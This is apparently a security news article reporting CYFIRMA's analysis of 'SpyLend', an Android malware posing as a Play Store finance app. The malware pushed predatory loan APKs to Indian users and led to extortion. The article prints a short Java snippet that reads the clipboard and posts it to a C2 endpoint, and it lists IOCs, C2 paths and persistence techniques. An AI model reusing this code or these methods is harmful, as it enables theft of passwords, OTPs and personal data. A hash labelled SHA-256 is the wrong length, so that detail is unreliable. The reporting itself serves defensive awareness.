A sophisticated Android malware campaign dubbed “SpyLend” has infiltrated the Google Play Store, masquerading as a financial utility app to target Indian users.
Disguised as “Finance Simplified” (package: com.someca.count), the app has amassed over 100,000 downloads since February 2025, leveraging its official platform presence to bypass user suspicion.
Cybersecurity firm CYFIRMA uncovered the operation, revealing a multi-layered attack designed to harvest sensitive data, deploy predatory loan services, and extort victims through blackmail.
.png
)
The app initially presents itself as a legitimate finance calculator but dynamically alters its interface based on the user’s geolocation.
.webp)
For Indian users, it launches a WebView component loading content from adv[.]rp5[.]org, a domain hosting unauthorized loan applications.
These loan services, such as KreditApple and MoneyApe, operate outside the Play Store’s scrutiny, redirecting victims to external Amazon EC2 servers to download malicious APKs (KreditApple.apk with SHA-256 fa27aa603eb6807dbc60d5dadc5b8f9b9290099f).
While the security researchers noted that once installed, SpyLend requests invasive permissions—including access to call logs, SMS, contacts, and the clipboard—under the guise of identity verification.
Users reporting harassment and blackmail cite threats involving manipulated photos, fake nude images, and demands for payment.
Negative reviews on the Play Store highlight complaints of data misuse, though the app remains available as of February 24, 2025.
Technical Exploitation and Command Infrastructure
The malware’s operational backbone lies in its abuse of Android’s WebView API and a custom command-and-control (C2) server.
By dynamically injecting JavaScript code, SpyLend fetches loan application listings via endpoints such as app/product/app/list and app/loan/config.
These APIs deliver loan parameters (interest rates, repayment methods) and track user interactions through app/user/saveVisitor, exfiltrating device metadata and behavioral analytics.
.webp)
A critical evasion tactic involves hosting loan apps on Amazon EC2 instances, bypassing Play Store vetting. The APKs employ persistence mechanisms like JobInfoSchedularService and AlarmManagerSchedularBroadcastReceiver, which run background tasks to maintain access.
The malware also harvests clipboard data every 3 seconds using ClipboardManager, capturing passwords, credit card details, and OTPs:-
// Clipboard monitoring code snippet
ClipboardManager clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
ClipData clip = clipboard.getPrimaryClip();
String clipboardData = clip.getItemAt(0).getText().toString();
// Exfiltrates data to C2 via JSON
JSONObject exfilData = new JSONObject();
exfilData.put("clipboard", clipboardData);
HttpClient.post(C2_ENDPOINT, exfilData); .webp)
The C2 infrastructure (16[.]163[.]9[.]142) uses endpoints like /admin/file/upload to receive stolen SMS, call logs, and app lists. Admin panels analyzed by CYFIRMA contain Chinese-language scripts (zh.js), suggesting threat actor origins.
Data exfiltration spans:-
- GPS coordinates (updated every 3 seconds via
LocationManager). - Installed apps and installation timestamps (using
PackageManager). - SMS content queried via
content://sms/URI.
Despite Google’s Play Protect safeguards, SpyLend’s use of WebView-delivered content allows real-time payload updates, evading static analysis.
CYFIRMA’s YARA rules (detecting hashes like 95a44305f9162352eddbb31e3ea03d7e) and MITRE ATT&CK mappings emphasize defense evasion (T1628) and credential access (T1414).
Users are urged to audit app permissions, avoid third-party APKs, and monitor for suspicious behavior. Enterprise recommendations include deploying endpoint detection tools and blacklisting IOCs like moneyape[.]org.
As financial malware evolves, collaborative efforts between app stores and cybersecurity entities remain critical to disrupting these threats.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here
